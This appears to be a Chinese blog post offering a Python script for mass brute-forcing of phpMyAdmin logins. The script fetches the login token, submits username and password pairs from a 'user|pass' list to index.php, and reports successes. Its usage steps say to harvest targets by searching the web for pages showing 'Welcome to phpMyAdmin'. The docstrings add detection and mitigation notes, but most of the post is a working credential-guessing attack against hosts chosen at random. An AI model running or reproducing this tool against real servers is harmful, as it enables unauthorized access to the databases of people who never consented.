使用Python实现phpMyAdmin的批量爆破
0x01 脚本实现
import requests
from bs4 import BeautifulSoup as bp
def attack(url, username, password):
    """Submit one username/password pair to the phpMyAdmin login form at *url*.

    Request sequence, as the target's web server sees it:
      1. GET ``url`` to load the login page and read its hidden ``token``
         input field.
      2. POST ``token``, ``pma_username`` and ``pma_password`` to
         ``url + "index.php"`` on the same session, so cookies set by the
         GET are carried over.
      3. If the response body contains the marker text this script treats
         as proof of a successful login, print the credential pair.

    Detection notes: the GET carries a fixed Chrome 64 User-Agent, while the
    POST is issued without that header dict and so goes out with the HTTP
    library's default User-Agent. A login-page GET immediately followed by a
    POST to ``index.php`` with ``pma_username``/``pma_password``, repeated
    with changing credentials from one client, is the pattern to alert on.
    Mitigations: keep phpMyAdmin off the public internet (network ACL or an
    extra authentication layer in front of it), throttle or lock out
    repeated failed logins, and do not leave default or weak database
    account passwords in place.

    Returns ``"no token"`` only from the guard below; every other path
    returns ``None``. All exceptions are swallowed, so a failed request
    produces no output.
    """
    browser_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"}
    http = requests.session()
    try:
        # Step 1: fetch the login page and locate <input type="hidden" name="token">.
        login_page = http.get(url, headers=browser_headers)
        parsed = bp(login_page.text, "lxml")
        token_field = parsed.find(attrs={"type": "hidden", "name": "token"})
        data = {"token": token_field.get("value", 0)}
        # Kept exactly as published: the form dict itself is compared with 0.
        if data == 0:
            return "no token"
        data['pma_username'] = username
        data['pma_password'] = password
        # Step 2: submit the login form; note that no custom headers are passed here.
        reply = http.post(url=url + "index.php", data=data)
        # Step 3: marker text the script uses to decide the login succeeded.
        if "phpMyAdmin is more friendly with a " in reply.text:
            print("[+] username:{0}, password:{1}".format(username, password))
    except Exception:
        # Any error (network failure, missing token field, ...) is discarded.
        pass
if __name__ == '__main__':
    # Driver: every line of Good.txt is combined with every "user|pass" line
    # of mima.txt, and each combination results in one attack() call, i.e.
    # one GET plus one POST against that host. The calls run sequentially
    # with no delay between them, so a targeted server sees a dense run of
    # failed logins from a single source; rate limiting and failed-login
    # alerting on the phpMyAdmin endpoint are the matching controls.
    # NOTE(review): the loop nesting was reconstructed from a listing whose
    # indentation had been lost.
    with open('./Good.txt', 'r') as host_file:
        host_t = host_file.readlines()
    for url in host_t:
        # Drop the line terminator left by readlines().
        if url.endswith('\n'):
            url = url[:-1]
        # The credential list is re-read from disk for each host.
        with open("mima.txt", "r") as cred_file:
            cred_lines = cred_file.readlines()
        for entry in cred_lines:
            username, password = entry.split("|")
            print("attack {0} use username:{1}|password:{2}".format(url, username, password))
            attack(url, username, password)
0x02 脚本的使用
- 先用批量采集工具采集url(关键词:“欢迎使用 phpMyadmin”)
- 将采集的url导出为Good.txt路径
- 然后密码的格式为: root|toor ,|左边为root,右边为toor